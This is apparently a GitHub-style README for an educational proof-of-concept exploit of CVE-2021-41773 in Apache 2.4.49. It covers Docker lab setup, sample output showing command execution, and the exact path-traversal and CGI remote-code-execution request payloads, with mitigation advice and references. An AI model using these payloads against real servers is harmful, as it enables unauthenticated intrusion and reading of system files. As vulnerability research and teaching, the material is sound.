Share
## https://sploitus.com/exploit?id=3130FD74-6B6E-5B18-91E0-27E97844245A
# CVE-2021-41773 โ€” Apache HTTP Server 2.4.49 Path Traversal / RCE

![Apache](https://img.shields.io/badge/Apache-2.4.49-red?logo=apache)
![CVE](https://img.shields.io/badge/CVE-2021--41773-critical)
![CVSS](https://img.shields.io/badge/CVSS-9.8-darkred)
![Python](https://img.shields.io/badge/Python-3.7%2B-blue?logo=python)
![Docker](https://img.shields.io/badge/Docker-required-blue?logo=docker)
![Lab Only](https://img.shields.io/badge/Lab%20Use-Only-yellow)

> **Educational research project.** All testing was performed in an isolated Docker lab. Do not use against any system you do not own.

---

## Vulnerability Summary

| Field | Detail |
|---|---|
| **CVE ID** | CVE-2021-41773 |
| **Affected Software** | Apache HTTP Server 2.4.49 only |
| **Vulnerability Type** | Path Traversal โ†’ Remote Code Execution |
| **CVSS Score** | 9.8 (Critical) |
| **Disclosed** | October 2021 |
| **Fixed In** | Apache 2.4.51 |

### Root Cause

Apache 2.4.49 fails to correctly normalize URL-encoded path sequences (`%2e%2e`) before applying access control rules. This allows an attacker to traverse outside the web root. When CGI is enabled, pointing the traversal at `/bin/sh` and supplying shell commands via POST body results in unauthenticated Remote Code Execution.

---

## Repository Contents

```
cve-2021-41773-poc/
โ”œโ”€โ”€ Dockerfile      # Intentionally vulnerable Apache 2.4.49 lab container
โ”œโ”€โ”€ exploit.py      # Python PoC โ€” uses raw sockets to preserve %2e encoding
โ”œโ”€โ”€ SETUP.md        # Step-by-step lab setup guide
โ”œโ”€โ”€ README.md       # This file
โ””โ”€โ”€ report.pdf      # Full exploit development report
```

---

## Quick Start

### 1. Build and run the vulnerable container

```bash
docker build -t apache-vuln-2449 .
docker run -d -p 8080:80 --name vuln-apache apache-vuln-2449
```

### 2. Run the exploit

```bash
python3 exploit.py
```

### 3. Expected output

```
==================================================
 CVE-2021-41773 PoC โ€” Lab Use Only
==================================================
[+] Target reachable โ€” HTTP 200

[*] Path Traversal โ€” Reading /etc/passwd
[*] Status: 403
[-] Blocked (403) โ€” server restrictions in place

[*] RCE โ€” Executing: id
[*] Status: 200
[+] OUTPUT:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[*] RCE โ€” Executing: whoami
[*] Status: 200
[+] OUTPUT:
daemon

[*] RCE โ€” Executing: hostname
[*] Status: 200
[+] OUTPUT:
e4ccca07bee7
```

> See [SETUP.md](SETUP.md) for full setup instructions and troubleshooting.

---

## How the Exploit Works

The `requests` library normalizes `%2e` โ†’ `.` before sending, which breaks the exploit (returns 400). This PoC uses **raw sockets** to send the HTTP request byte-for-byte, preserving the encoded traversal sequence exactly as Apache 2.4.49 needs to receive it.

**Traversal payload:**
```
GET /.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
```

**RCE payload:**
```
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo Content-Type: text/plain; echo; id
```

Apache fails to decode `%2e%2e` before ACL checks, processes the request, routes it through CGI, and executes the POST body as a shell command.

---

## Mitigation

- **Upgrade** Apache to 2.4.51 or later
- **Disable CGI** unless strictly required
- **Never use** `Require all granted` on `/`
- Apply security patches promptly upon release

---

## References

- [CVE-2021-41773 โ€” MITRE](https://vulners.com/cve/CVE-2021-41773)
- [Apache Security Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)
- [ExploitDB #50383](https://www.exploit-db.com/exploits/50383)
- [Rapid7 Analysis](https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2021-41773)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)

---

## Author

**Abdur Rehman Siddiqui**  
Exploit Development โ€” Task 3  

---

> This repository is for **educational purposes only**. The author is not responsible for any misuse of this material.